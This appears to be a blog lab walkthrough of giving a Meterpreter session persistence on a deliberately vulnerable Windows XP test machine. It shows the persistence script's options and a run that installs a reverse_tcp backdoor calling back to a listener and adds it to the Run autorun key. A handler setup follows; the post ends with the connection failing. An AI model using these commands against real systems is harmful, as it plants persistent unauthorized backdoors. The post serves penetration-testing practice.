This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:
Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
The following Meterpreter persistence script ensures access to the exploited system even after a reboot. This script comes with a warning
One word of warning here before we go any further. The persistent Meterpreter as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, be sure to exercise the utmost caution and be sure to clean up after yourself when the engagement is done.
Here’s the Persistence options:
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
On to the Meterpreter script:
meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.79
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/LAB_20130625.2221/LAB_20130625.2221.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.79 LPORT=443
[*] Persistent agent script is 611063 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
[*] Executing script C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
[+] Agent executed with PID 2520
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TgZcTlqTJNmSbP
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TgZcTlqTJNmSbP
meterpreter >
I have rebooted the target machine and will now to test the connection from Metasploit.
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST 192.168.1.79
LHOST => 192.168.1.79
msf exploit(handler) > exploit[-] Handler failed to bind to 192.168.1.79:443
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler…
And it stuck there.
No idea why this didn’t work.